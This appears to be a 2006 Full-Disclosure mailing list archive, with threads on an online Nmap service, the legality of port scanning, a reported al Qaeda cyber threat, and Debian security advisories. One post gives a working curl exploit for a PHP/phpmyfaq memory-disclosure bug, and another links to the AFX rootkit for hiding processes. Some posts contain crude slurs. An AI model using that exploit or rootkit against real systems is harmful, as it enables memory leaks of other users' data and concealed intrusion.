> For all Nmap fans, our group have implemented Nmap Online service.
> Its address is http://nmap-online.com/. The interface allows you to perform
> custom
> Nmap scans from our server with only a few limitations in the syntax.
> The service is free and can be used immediately, no registration is
> required.
>
> Please direct your questions and suggestions to our emails.
>
> Regards,
>

From julio at rfdslabs.com.br Fri Dec 1 14:37:43 2006
From: julio at rfdslabs.com.br (Julio Cesar Fort)
Date: Fri, 01 Dec 2006 11:37:43 -0300
Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack
Message-ID:

From the Reuters article:
"WASHINGTON (Reuters) - The U.S. government warned American private financial services on Thursday of an al Qaeda call for a cyber attack against online stock trading and banking Web sites beginning on Friday, a source said."

Makes me remind US Bombs' "The World" song ;)

Julio Cesar Fort
Recife, PE, Brazil
www.rfdslabs.com.br - computers, sex, human mind, music and more.

From SDALAN04 at smumn.edu Fri Dec 1 14:47:09 2006
From: SDALAN04 at smumn.edu (SDALAN04 at smumn.edu)
Date: Fri, 01 Dec 2006 08:47:09 -0600
Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack
Message-ID: <200612011447096941632096@mail.smumn.edu>

Yet you continue to pump this bullshit out just like our American Government. WTF is wrong with you. Nobody but a few people believe this shit. Hopefully this rant will kill this gay-ass thread... Asshole ;)

On Friday, December 01, 2006 8:34 AM, Juha-Matti Laurio wrote:
>From the Reuters article:
>
>Date: Fri, 1 Dec 2006 16:34:06 +0200 (EET)
>From: Juha-Matti Laurio
>To: bugtraq at securityfocus.com, full-disclosure at lists.grok.org.uk
>Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack
>
>"WASHINGTON (Reuters) - The U.S. government warned American private financial services on Thursday of an al Qaeda call for a cyber attack against online stock trading and banking Web sites beginning on Friday, a source said."
>
>Reportedly DHS confirmed an alert had been distributed but said there was no reason to believe the threat was credible.
>
>More at
>http://today.reuters.com/News/newsArticle.aspx?type=internetNews&storyID=2006-12-01T061519Z_01_WBT006236_RTRUKOC_0_US-SECURITY-USA-QAEDA.xml&WTmodLoc=InternetNewsHome_C1_%5bFeed%5d-8
>
>SANS Internet Storm Center (ISC) has issued the following Diary entries,
>several references included:
>
>From ISC director Marcus H. Sachs:
>http://isc.sans.org/diary.php?storyid=1900
>
>and "US DHS banking alert" entry released earlier by Johannes Ullrich:
>http://isc.sans.org/diary.php?storyid=1899
>
>- Juha-Matti
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/

"Great Spirits Have Always Encountered Violent Opposition From Mediocre Minds" - Einstein

"So much stupidity in so little brain!"

From randallm at fidmail.com Fri Dec 1 14:53:45 2006
From: randallm at fidmail.com (Randall M)
Date: Fri, 1 Dec 2006 08:53:45 -0600
Subject: [Full-disclosure] Nmap Online
In-Reply-To:
Message-ID: <20061201145351.0F8DF1236@lists.grok.org.uk>

[
[------------------------------
[
[Message: 11
[Date: Fri, 1 Dec 2006 06:48:38 -0500
[From: "Dude VanWinkle"
[Subject: Re: [Full-disclosure] Nmap Online
[To: "Mike Huber"
[Cc: full-disclosure at lists.grok.org.uk
[Message-ID:
[
[Content-Type: text/plain; charset=ISO-8859-1; format=flowed
[
[On 12/1/06, Mike Huber wrote:
[> first of all, IANAL, but the TOS seem to cover the basics...
[
[> None-the-less, my 8-ball sees litigation in their future.
[
[
[portscanning isn't illegal in the states
[
[-JP
[
[

RandallM

From michael.holstein at csuohio.edu Fri Dec 1 15:04:39 2006
From: michael.holstein at csuohio.edu (Michael Holstein)
Date: Fri, 01 Dec 2006 10:04:39 -0500
Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack
In-Reply-To: <16640517.344181164983646039.JavaMail.juha-matti.laurio@netti.fi>
References: <16640517.344181164983646039.JavaMail.juha-matti.laurio@netti.fi>
Message-ID: <45704487.3060306@csuohio.edu>

> Reportedly DHS confirmed an alert had been distributed but said there was no reason to believe the threat was credible.

and since when is DHS "credible" itself? and why do people scatter every
time their terrorism "mood ring" changes color?

I guess they don't realize that servers overheat when wrapped with
plastic and duct tape.

~Mike.

From michael.holstein at csuohio.edu Fri Dec 1 15:08:17 2006
From: michael.holstein at csuohio.edu (Michael Holstein)
Date: Fri, 01 Dec 2006 10:08:17 -0500
Subject: [Full-disclosure] Nmap Online
In-Reply-To: <456FF8AA.9B1E.0073.0@alterhighschool.org>
References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> <1bde4ec50612010448y4c0bc8fbi1b9ad62235c58757@mail.gmail.com> <456FF8AA.9B1E.0073.0@alterhighschool.org>
Message-ID: <45704561.5080800@csuohio.edu>

> ...I wonder if someone probably didn't like all the portscans they got
> from it (....thinks of Microsoft) and took it out?
> David.

Heck .. how to portscan Microsoft has been in the Nmap man page for ages (even in the help you get when you execute it without arguments) .. although it's not in the latest version (it was the -P0 option).

It still has Microsoft as an example in usage though :

Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254

~Mike.

From SDALAN04 at smumn.edu Fri Dec 1 15:15:52 2006
From: SDALAN04 at smumn.edu (SDALAN04 at smumn.edu)
Date: Fri, 01 Dec 2006 09:15:52 -0600
Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack
Message-ID: <200612011515526141632399@mail.smumn.edu>

I beg to differ Mike, they are trying to play the same lame ass game that the (Bush) Oil industry, trying to raise interest rates because Osama Bin Laden is going to hack everyone's account. Not so smart, I guess I better withdraw all my money American and buy Euros to be safe?

On Friday, December 01, 2006 9:04 AM, Michael Holstein wrote:
>> Reportedly DHS confirmed an alert had been distributed but said there was no reason to believe the threat was credible.
>
>Date: Fri, 01 Dec 2006 10:04:39 -0500
>From: Michael Holstein
>To:
>Subject: Re: [Full-disclosure] Financial firms warned of Qaeda cyber attack
>
>and since when is DHS "credible" itself? and why do people scatter every
>time their terrorism "mood ring" changes color?
>
>I guess they don't realize that servers overheat when wrapped with
>plastic and duct tape.
>
>~Mike.

"Great Spirits Have Always Encountered Violent Opposition From Mediocre Minds" - Einstein

"So much stupidity in so little brain!"

From chedder1 at gmail.com Fri Dec 1 15:25:35 2006
From: chedder1 at gmail.com (chedder1 at gmail.com)
Date: Fri, 01 Dec 2006 07:25:35 -0800
Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack
In-Reply-To: <16640517.344181164983646039.JavaMail.juha-matti.laurio@netti.fi>
References: <16640517.344181164983646039.JavaMail.juha-matti.laurio@netti.fi>
Message-ID: <20061201152535.GA5758@cheesebox.vc.shawcable.net>

Teehee, yeah.. and they are gunna use pen-guns like in james bond, expose iraqs WMDs, an topple in entire western world to... since when do caves even have connections?

On Fri, Dec 01, 2006 at 04:34:06PM +0200, Juha-Matti Laurio wrote:
> From the Reuters article:
> "WASHINGTON (Reuters) - The U.S. government warned American private financial services on Thursday of an al Qaeda call for a cyber attack against online stock trading and banking Web sites beginning on Friday, a source said."
>
> Reportedly DHS confirmed an alert had been distributed but said there was no reason to believe the threat was credible.
>
> More at
> http://today.reuters.com/News/newsArticle.aspx?type=internetNews&storyID=2006-12-01T061519Z_01_WBT006236_RTRUKOC_0_US-SECURITY-USA-QAEDA.xml&WTmodLoc=InternetNewsHome_C1_%5bFeed%5d-8
>
> SANS Internet Storm Center (ISC) has issued the following Diary entries,
> several references included:
>
> From ISC director Marcus H. Sachs:
> http://isc.sans.org/diary.php?storyid=1900
>
> and "US DHS banking alert" entry released earlier by Johannes Ullrich:
> http://isc.sans.org/diary.php?storyid=1899
>
> - Juha-Matti

--
http://chedder.hacked.in
"You don't exist. Go away"

From skx at debian.org Fri Dec 1 15:36:34 2006
From: skx at debian.org (Steve Kemp)
Date: Fri, 1 Dec 2006 15:36:34 +0000
Subject: [Full-disclosure] [SECURITY] [DSA 1205-2] New thttpd packages fix insecure temporary file creation
Message-ID: <20061201153634.GA20597@steve.org.uk>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1205-2    security at debian.org
http://www.debian.org/security/    Steve Kemp
December 1st, 2006    http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package : thttpd
Vulnerability : insecure temporary files
Problem-Type : local
Debian-specific: yes
CVE ID : CVE-2006-4248
Debian Bug : 396277

Marco d'Itri discovered that thttpd, a small, fast and secure webserver, makes use of insecure temporary files when its logfiles are rotated, which might lead to a denial of service through a symlink attack.

The original advisory for this issue didn't contain fixed packages for all supported architectures which are corrected in this update.

For the stable distribution (sarge) this problem has been fixed in version 2.23beta1-3sarge2

For the unstable distribution (sid) this problem has been fixed in version 2.23beta1-5

We recommend that you upgrade your thttpd package.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 3.1 alias sarge
- --------------------------------

These files will probably be moved into the stable distribution on its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFFcEu4wM/Gs81MDZ0RAlC3AKCwfFp3xBERF++ZlJrbrE05r8Z+WgCfdQ0K
HeTSA+a1FJmlA36FbBRFj6Q=
=3NoA
-----END PGP SIGNATURE-----

From Valdis.Kletnieks at vt.edu Fri Dec 1 15:53:07 2006
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Fri, 01 Dec 2006 10:53:07 -0500
Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack
In-Reply-To: Your message of "Fri, 01 Dec 2006 11:37:43 -0300."
References:
Message-ID: <200612011553.kB1Fr7KY015326@turing-police.cc.vt.edu>

On Fri, 01 Dec 2006 11:37:43 -0300, Julio Cesar Fort said:
> From the Reuters article:
> "WASHINGTON (Reuters) - The U.S. government warned American private
> financial services on Thursday of an al Qaeda call for a cyber attack
> against online stock trading and banking Web sites beginning on Friday,
> a source said."

We're lucky that al Qaeda didn't call for a bioterrorism attack, like
flesh-eating bacteria in the entire US supply of Hanes jockey shorts. ;)

From tonu at jes.ee Fri Dec 1 14:57:41 2006
From: tonu at jes.ee (Tonu Samuel)
Date: Fri, 1 Dec 2006 16:57:41 +0200
Subject: [Full-disclosure] phpmyfaq exploit using PHP bug, CVE-2006-1490
Message-ID: <200612011657.41992.tonu@jes.ee>

Long time ago I made unnecessary noise about PHP zeroday.
I expected it to be maybe much more dangerous than it appeared to be at end. There was lot of discussions and one of main consensus was that this bug is not exploitable in real world because no one is using those vulnerable functions. This bug was originally found using phpmyfaq software and wrong assumption was made about wideness of problem.

Anyway now half year later it is time to show exploit:

curl "http://vulnerablehost/phpmyfaq/admin/index.php" -D - -d "faqusername=%00VERYLONGSTRINGHEREEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"

Longer input you provide, longer memory dump you get. Works if PHP is unpatched AND phpmyfaq is older than 1.6.0. Memory dump you get is part of apache memory and often contains sensitive information from other served pages and contexts.

To make it clear - this is NOT fault of phpmyfaq people at all. Even more, they made workaround within an hour after I contacted them and urged users to upgrade. Just phpmyfaq appears to be one popular software which is easily findable by Google and this was the software where initially discovery was made. PHP people knew about problem but ignored for long enough to discover it independently from them.

Tõnu

From colin.75 at btinternet.com Fri Dec 1 16:15:55 2006
From: colin.75 at btinternet.com (Colin Copley)
Date: Fri, 1 Dec 2006 16:15:55 -0000
Subject: [Full-disclosure] how to hide files, services and process in windows 2k/xp/2k3 box
References: 003401c58548$1272f370$6f64a8c0@microsof28e7c5 <456F6FC5.5090802@markbaker.net>
Message-ID: <00a401c71563$fb1d5e60$0301a8c0@intuwares.com>

"Mark Baker" wrote:
> I am trying to find a rootkit to hide processes and dll's from World of
> Warcraft but can't find where to download AFX rootkit. Can you direct
> me where to download the rootkit and instructions?

The home page seems to be down. You can download AFX 2005 here:

www.rootkit.com/vault/therealaphex/AFXRootkit2005.zip

They also have a nice selection of alternatives.
But why would u want to cheat at Warcraft?
Must be Alliance.

Cheers
Colin

From b.hines at comcast.net Fri Dec 1 16:33:56 2006
From: b.hines at comcast.net (b.hines at comcast.net)
Date: Fri, 01 Dec 2006 16:33:56 +0000
Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack
Message-ID: <120120061633.17526.45705974000B3B870000447622007340769C0A020708D20D@comcast.net>

Valdis,
or worse a Japanese game show I think?

http://www.glumbert.com/media/tonguetwister.html

-------------- Original message --------------
From: Valdis.Kletnieks at vt.edu

From dudevanwinkle at gmail.com Fri Dec 1 16:45:53 2006
From: dudevanwinkle at gmail.com (Dude VanWinkle)
Date: Fri, 1 Dec 2006 11:45:53 -0500
Subject: [Full-disclosure] Nmap Online
In-Reply-To: <86zma7shm8.fsf@blue.stonehenge.com>
References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> <86zma7shm8.fsf@blue.stonehenge.com>
Message-ID:

On 01 Dec 2006 08:31:11 -0800, Randal L. Schwartz wrote:
> >>>>> "Dude" == Dude VanWinkle writes:
>
> Dude> On 12/1/06, Mike Huber wrote:
> >> first of all, IANAL, but the TOS seem to cover the basics...
> Dude>
> >> None-the-less, my 8-ball sees litigation in their future.
>
> Dude> portscanning isn't illegal in the states
>
> If it can be argued as an "unauthorized access", it's at least a misdemeanor
> in many states, felony in some. And you don't want to be on the wrong end of
> that prosecution.
>
> --
> Randal L. Schwartz - Stonehenge Consulting Services, Inc. - +1 503 777 0095

It's obvious that anyone who hires Stonehenge Consulting services is
getting someone who can't read.
I never said portscanning was illegal.
i said it "isn't illegal". I even provided a link to the case in
georgia that helped decide this.

-JP

From dudevanwinkle at gmail.com Fri Dec 1 16:49:14 2006
From: dudevanwinkle at gmail.com (Dude VanWinkle)
Date: Fri, 1 Dec 2006 11:49:14 -0500
Subject: [Full-disclosure] Nmap Online
In-Reply-To: <86vekvshj7.fsf@blue.stonehenge.com>
References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> <829b2de40612010456n1049c644ie06d1ff292abba7d@mail.gmail.com> <86vekvshj7.fsf@blue.stonehenge.com>
Message-ID:

On 01 Dec 2006 08:33:00 -0800, Randal L. Schwartz wrote:
> >>>>> "Dude" == Dude VanWinkle writes:
>
> Dude> Here is an example of what is legal vs what isn't: If you scan a
> Dude> machine with nmap from one machine, that is not illegal. If you run
> Dude> 100,00 nmap scans from a distributed botnet and take down their
> Dude> server, that's illegal.
>
> It's clear you're not a lawyer, and anyone who takes your advice here would be
> a fool. But I just wanted to point that out again for the clueless.

so if you are disagreeing with one of the above statements, then one
of the following must be true in your opinion:

you _can_ legally DoS someone's server with 100,000 nmap scans

or

It is illegal to portscan

learn to read buddy.

-JP

From merlyn at stonehenge.com Fri Dec 1 16:31:11 2006
From: merlyn at stonehenge.com (Randal L. Schwartz)
Date: 01 Dec 2006 08:31:11 -0800
Subject: [Full-disclosure] Nmap Online
In-Reply-To:
References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com>
Message-ID: <86zma7shm8.fsf@blue.stonehenge.com>

>>>>> "Dude" == Dude VanWinkle writes:

Dude> On 12/1/06, Mike Huber wrote:
>> first of all, IANAL, but the TOS seem to cover the basics...
Dude>
>> None-the-less, my 8-ball sees litigation in their future.

Dude> portscanning isn't illegal in the states

If it can be argued as an "unauthorized access", it's at least a misdemeanor
in many states, felony in some. And you don't want to be on the wrong end of
that prosecution.

--
Randal L. Schwartz - Stonehenge Consulting Services, Inc. - +1 503 777 0095
Perl/Unix/security consulting, Technical writing, Comedy, etc. etc.
See PerlTraining.Stonehenge.com for onsite and open-enrollment Perl training!

From merlyn at stonehenge.com Fri Dec 1 16:33:00 2006
From: merlyn at stonehenge.com (Randal L. Schwartz)
Date: 01 Dec 2006 08:33:00 -0800
Subject: [Full-disclosure] Nmap Online
In-Reply-To:
References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> <829b2de40612010456n1049c644ie06d1ff292abba7d@mail.gmail.com>
Message-ID: <86vekvshj7.fsf@blue.stonehenge.com>

>>>>> "Dude" == Dude VanWinkle writes:

Dude> Here is an example of what is legal vs what isn't: If you scan a
Dude> machine with nmap from one machine, that is not illegal. If you run
Dude> 100,00 nmap scans from a distributed botnet and take down their
Dude> server, that's illegal.

It's clear you're not a lawyer, and anyone who takes your advice here would be
a fool. But I just wanted to point that out again for the clueless.

--
Randal L. Schwartz - Stonehenge Consulting Services, Inc. - +1 503 777 0095
Perl/Unix/security consulting, Technical writing, Comedy, etc. etc.
See PerlTraining.Stonehenge.com for onsite and open-enrollment Perl training!

From merlyn at stonehenge.com Fri Dec 1 16:54:23 2006
From: merlyn at stonehenge.com (Randal L. Schwartz)
Date: 01 Dec 2006 08:54:23 -0800
Subject: [Full-disclosure] Nmap Online
In-Reply-To:
References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> <86zma7shm8.fsf@blue.stonehenge.com>
Message-ID: <86irgvsgjk.fsf@blue.stonehenge.com>

>>>>> "Dude" == Dude VanWinkle writes:

Dude> It's obvious that anyone who hires Stonehenge Consulting services is
Dude> getting someone who can't read. I never said portscanning was illegal.
Dude> i said it "isn't illegal".

And I'm disagreeing with this.

Dude> I even provided a link to the case in
Dude> georgia that helped decide this.

If there's caselaw in Georgia, that's useful for Georgia, but
certainly isn't referencable in the 49 other states. So you can't
generalize that.

--
Randal L. Schwartz - Stonehenge Consulting Services, Inc. - +1 503 777 0095
Perl/Unix/security consulting, Technical writing, Comedy, etc. etc.
See PerlTraining.Stonehenge.com for onsite and open-enrollment Perl training!

From chedder1 at gmail.com Fri Dec 1 16:59:30 2006
From: chedder1 at gmail.com (chedder1 at gmail.com)
Date: Fri, 01 Dec 2006 08:59:30 -0800
Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack
In-Reply-To: <120120061633.17526.45705974000B3B870000447622007340769C0A020708D20D@comcast.net>
References: <120120061633.17526.45705974000B3B870000447622007340769C0A020708D20D@comcast.net>
Message-ID: <20061201165930.GA6122@cheesebox.vc.shawcable.net>

HOLY SHIT!!! What if they are responsible for japanese gameshows!?

On Fri, Dec 01, 2006 at 04:33:56PM +0000, b.hines at comcast.net wrote:
> Valdis,
> or worse a Japanese game show I think?
>
> http://www.glumbert.com/media/tonguetwister.html
> -------------- Original message --------------
> From: Valdis.Kletnieks at vt.edu

--
http://chedder.hacked.in
"You don't exist. Go away"

From noahm at debian.org Fri Dec 1 16:26:11 2006
From: noahm at debian.org (Noah Meyerhans)
Date: Fri, 01 Dec 2006 17:26:11 +0100
Subject: [Full-disclosure] [SECURITY] [DSA 1223-1] New tar packages fix arbitrary file overwrite
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1223-1    security at debian.org
http://www.debian.org/security/    Noah Meyerhans
December 01, 2006
- ------------------------------------------------------------------------

Package : tar
Vulnerability : input validation error
Problem type : local
Debian-specific: no
CVE Id(s) : CVE-2006-6097
BugTraq ID : 21235
Debian Bug : 399845

Teemu Salmela discovered a vulnerability in GNU tar that could allow a malicious user to overwrite arbitrary files by inducing the victim to attempt to extract a specially crafted tar file containing a GNUTYPE_NAMES record with a symbolic link.

For the stable distribution (sarge), this problem has been fixed in version 1.14-2.3

For the unstable distribution (sid) and the forthcoming stable release (etch), this problem will be fixed in version 1.16-2.

We recommend that you upgrade your tar package.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian 3.1 (stable)
- -------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, m68k, mips, mipsel, powerpc, s390 and sparc.

These files will probably be moved into the stable distribution on its next update.
- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFFcFcbYrVLjBFATsMRAn5hAJ93K1jekZBwWNyIksJkhFoJjcFczwCdHu23
g3FxyAVvV5ABJFj/9m4O8iE=
=Es6i
-----END PGP SIGNATURE-----

From endrazine at gmail.com Fri Dec 1 17:22:53 2006
From: endrazine at gmail.com (endrazine)
Date: Fri, 01 Dec 2006 18:22:53 +0100
Subject: [Full-disclosure] Nmap Online
In-Reply-To: <457035E5.8090405@matousec.com>
References: <01af01c7154f$b518a780$654b5b82@shakuhachi> <457035E5.8090405@matousec.com>
Message-ID: <457064ED.7000300@gmail.com>

Hi David & list,

David Matousek wrote:
> We have set limits to prevent abusing of our service.
>
common, you're calling to get pwned here...

> Yes, one can still scan someone other's network, this is in violation with our Terms of Service.
>
Ouh, now that's scary.

> We log every attempt and we are ready to provide these logs to authorities.
>
Ever heard of tor ??

> However, everyone who has Internet access is able to download Nmap
> and do similar scan. You can do nothing more with our service.
> There is no damage you can cause with our service even if it is abused.
> We believe that pros are more than cons here, that people will use our service
> to fix their issues on their firewalls and networks

What about online metasploit & Core Impact too ?
;D

Cheers,

endrazine-

From dudevanwinkle at gmail.com Fri Dec 1 17:24:56 2006
From: dudevanwinkle at gmail.com (Dude VanWinkle)
Date: Fri, 1 Dec 2006 12:24:56 -0500
Subject: [Full-disclosure] Nmap Online
In-Reply-To: <86irgvsgjk.fsf@blue.stonehenge.com>
References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> <86zma7shm8.fsf@blue.stonehenge.com> <86irgvsgjk.fsf@blue.stonehenge.com>
Message-ID:

On 01 Dec 2006 08:54:23 -0800, Randal L. Schwartz wrote:
> >>>>> "Dude" == Dude VanWinkle writes:
>
> Dude> It's obvious that anyone who hires Stonehenge Consulting services is
> Dude> getting someone who can't read. I never said portscanning was illegal.
> Dude> i said it "isn't illegal".
>
> And I'm disagreeing with this.

Why?

> Dude> I even provided a link to the case in
> Dude> georgia that helped decide this.
>
> If there's caselaw in Georgia, that's useful for Georgia, but
> certainly isn't referencable in the 49 other states. So you can't
> generalize that.

So, you are disagreeing with Kevin who states:

http://www.securityfocus.com/news/126
"The ruling does not affect criminal applications of the anti-hacking
law, but federal law enforcement officials are generally in agreement
that port scanning is not a crime."

Do you know of a case where someone was convicted due to a portscan? I
can imagine that a portscan may be used in conjunction with other
evidence to build a case for intent, but I have not heard of anyone
being busted for an nmap scan.

I was going to build the case, but it looks like someone has already
done it for me:

from:http://www.krcf.org/krcfhome/MINDS_NEWYORK/1MoC3e_d.htm

Only one published opinion has considered the legality of port scans.
That court held that such activity did not violate federal or state
computer protection statutes or other law. The federal district court
for the Northern District of Georgia held that a party who conducted
port scans of another party's computer systems did not violate the
Computer Fraud and Abuse Act (18 U.S.C. s. 1030) [1], because he
neither caused damage nor gained access to the computers at issue.
Moulton v. VC3, 2000 WL 3331091 at *6 (N.D. Ga., Nov. 7, 2000). Nor
did the port scans violate state law, because they did not interfere
with computer or network activity.

References:

[1] The Computer Fraud and Abuse Act:
[2] Moulton v. VC3, 2000 WL 3331091 (N.D. Ga., Nov. 7, 2000)
[3] Computer Crime and Intellectual Property Section, U.S. Department
    of Justice, Legislative Analysis of the 1996 National Information
    Infrastructure Protection Act:
[4] Computer Crime and Intellectual Property Section, U.S. Department
    of Justice, Field Guidance on New Authorities That Relate to
    Computer Crime and Electronic Evidence Enacted in the USA Patriot
    Act of 2001

---------------------------

So back to my earlier statement, if you nessus someone's machine, that
would impact their performance and be illegal, a single nmap scan, not
so much.

Now I am not saying that some hot-shot lawyer wouldn't be able to
convince a judge to imprison someone for an nmap scan but while you
may be able to convince a judge that OJ didn't do it, murder is still
illegal

-JP

From dudevanwinkle at gmail.com Fri Dec 1 17:34:09 2006
From: dudevanwinkle at gmail.com (Dude VanWinkle)
Date: Fri, 1 Dec 2006 12:34:09 -0500
Subject: [Full-disclosure] Nmap Online
In-Reply-To: <86irgvsgjk.fsf@blue.stonehenge.com>
References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> <86zma7shm8.fsf@blue.stonehenge.com> <86irgvsgjk.fsf@blue.stonehenge.com>
Message-ID:

On 01 Dec 2006 08:54:23 -0800, Randal L. Schwartz wrote:
>
> If there's caselaw in Georgia, that's useful for Georgia, but
> certainly isn't referencable in the 49 other states.

actually, it is. it is called legal precedence

From merlyn at stonehenge.com Fri Dec 1 17:36:58 2006
From: merlyn at stonehenge.com (Randal L. Schwartz)
Date: 01 Dec 2006 09:36:58 -0800
Subject: [Full-disclosure] Nmap Online
In-Reply-To:
References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> <86zma7shm8.fsf@blue.stonehenge.com> <86irgvsgjk.fsf@blue.stonehenge.com>
Message-ID: <86bqmnsekl.fsf@blue.stonehenge.com>

>>>>> "Dude" == Dude VanWinkle writes:

Dude> On 01 Dec 2006 08:54:23 -0800, Randal L. Schwartz wrote:
>>
>> If there's caselaw in Georgia, that's useful for Georgia, but
>> certainly isn't referencable in the 49 other states.

Dude> actually, it is. it is called legal precedence

It wasn't clear from your posting that you were talking about a federal case.
In that case, yes, it's caselaw. However, if it was just Georgia state law,
that would *not* create case law for any other state.

By the way, "caselaw" and "legal precedent" are the same.

--
Randal L. Schwartz - Stonehenge Consulting Services, Inc. - +1 503 777 0095
Perl/Unix/security consulting, Technical writing, Comedy, etc. etc.
See PerlTraining.Stonehenge.com for onsite and open-enrollment Perl training!

From dudevanwinkle at gmail.com Fri Dec 1 16:52:21 2006
From: dudevanwinkle at gmail.com (Dude VanWinkle)
Date: Fri, 1 Dec 2006 11:52:21 -0500
Subject: [Full-disclosure] Nmap Online
In-Reply-To: <457041f8.22c98603.2bc1.5db2SMTPIN_ADDED@mx.google.com>
References: <457041f8.22c98603.2bc1.5db2SMTPIN_ADDED@mx.google.com>
Message-ID:

On 12/1/06, Randall M wrote:
>
> [
> [------------------------------
> [
> [Message: 11
> [Date: Fri, 1 Dec 2006 06:48:38 -0500
> [From: "Dude VanWinkle"
> [Subject: Re: [Full-disclosure] Nmap Online
> [To: "Mike Huber"
> [Cc: full-disclosure at lists.grok.org.uk
> [Message-ID:
> [
> [Content-Type: text/plain; charset=ISO-8859-1; format=flowed
> [
> [On 12/1/06, Mike Huber wrote:
> [> first of all, IANAL, but the TOS seem to cover the basics...
> [
> [> None-the-less, my 8-ball sees litigation in their future.
> [
> [
> [portscanning isn't illegal in the states
> [
> [-JP [a lawyer>
> [
> [
>
> RandallM
>
>

-JP

From dudevanwinkle at gmail.com Fri Dec 1 17:45:39 2006
From: dudevanwinkle at gmail.com (Dude VanWinkle)
Date: Fri, 1 Dec 2006 12:45:39 -0500
Subject: [Full-disclosure] Nmap Online
In-Reply-To: <86bqmnsekl.fsf@blue.stonehenge.com>
References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> <86zma7shm8.fsf@blue.stonehenge.com> <86irgvsgjk.fsf@blue.stonehenge.com> <86bqmnsekl.fsf@blue.stonehenge.com>
Message-ID:

On 01 Dec 2006 09:36:58 -0800, Randal L. Schwartz wrote:
> >>>>> "Dude" == Dude VanWinkle writes:
>
> Dude> On 01 Dec 2006 08:54:23 -0800, Randal L. Schwartz wrote:
> >>
> >> If there's caselaw in Georgia, that's useful for Georgia, but
> >> certainly isn't referencable in the 49 other states.
>
> Dude> actually, it is. it is called legal precedence
>
> It wasn't clear from your posting that you were talking about a federal case.

well try reading the material I reference before saying that anyone
who listens to me is a fool next time plz.

> In that case, yes, it's caselaw. However, if it was just Georgia state law,
> that would *not* create case law for any other state.
>
> By the way, "caselaw" and "legal precedent" are the same.

thanks for the info, i learned something new today, which makes it a good day.

From michael.holstein at csuohio.edu Fri Dec 1 17:58:51 2006
From: michael.holstein at csuohio.edu (Michael Holstein)
Date: Fri, 01 Dec 2006 12:58:51 -0500
Subject: [Full-disclosure] Nmap Online
In-Reply-To: <86zma7shm8.fsf@blue.stonehenge.com>
References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> <86zma7shm8.fsf@blue.stonehenge.com>
Message-ID: <45706D5B.5070409@csuohio.edu>

> If it can be argued as an "unauthorized access", it's at least a misdemeanor
> in many states, felony in some. And you don't want to be on the wrong end of
> that prosecution.

"Illegal" and "Unlawful" are both fuzzy terms. Basically it's a matter
of which side can convince 12 folks who have nothing better to do than
drink stale coffee for $6/day.

From jmm at debian.org Fri Dec 1 18:11:17 2006
From: jmm at debian.org (Moritz Muehlenhoff)
Date: Fri, 1 Dec 2006 19:11:17 +0100
Subject: [Full-disclosure] [SECURITY] [DSA 1222-2] New proftpd packages fix several vulnerabilities
Message-ID: <20061201181117.GA3274@galadriel.inutil.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1222-2                    security at debian.org
